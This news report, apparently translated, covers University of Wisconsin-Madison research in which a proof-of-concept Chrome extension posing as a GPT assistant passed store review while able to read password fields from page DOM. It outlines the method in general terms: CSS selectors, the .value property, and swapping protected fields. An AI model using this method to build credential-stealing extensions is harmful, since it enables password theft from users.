Researchers from the University of Wisconsin at Madison have discovered a vulnerability in the extensions store for Google Chrome. They have developed an experimental expansion which, when successfully passed moderation, can steal user passwords directly from the source code of web pages.
The root of the problem lies in the existing model of resolutions for the browser. This model grants extensions access to the DOM-derivatives of sites, including potentially sensitive information such as input fields.
Researchers argue that this model contradicts the principles of “smallest privileges” and “complete mediation”, which dictate that programs should only have the necessary rights and that each request for access should be checked. Currently, the architecture of permissions does not establish strict security boundaries between the extensions and the elements of the web page. As a result, attackers can “intercept” data entered by users in real time, bypassing any site protection mechanisms.
To test the moderation process, experts created a fake plugin that appears to be an assistant working on the GPT basis. This extension has the ability to update the source code of HTML when users try to enter a site, use CSS selectors to select target entry fields, and extract information using the .value function. It can also replace protected password fields with vulnerable ones.
The fake extension does not contain any clearly harmful code and complies with all the requirements of the Manifest V3 protocol. This allowed it to successfully pass the check before publication in the Chrome Web Store.
The analysis conducted by the researchers revealed that approximately 17,300 extensions in the Chrome Web Store have permission to access confidential information. This includes popular programs for blocking advertising and applications for online purchases with millions of downloads.
The researchers further found that out of the top 10,000 sites, about 1,100 store passwords in plain text within the structure of the web page. Another 7,300 sites were vulnerable through access tools.
Notably, large platforms such as Gmail, Cloudflare, and Facebook were identified as particularly vulnerable.
Both Google and Amazon, which were also at risk, have responded to the situation. Amazon stated that customer safety is of utmost importance and directed developers to take immediate action. A representative from Google confirmed that the company is currently investigating the issue.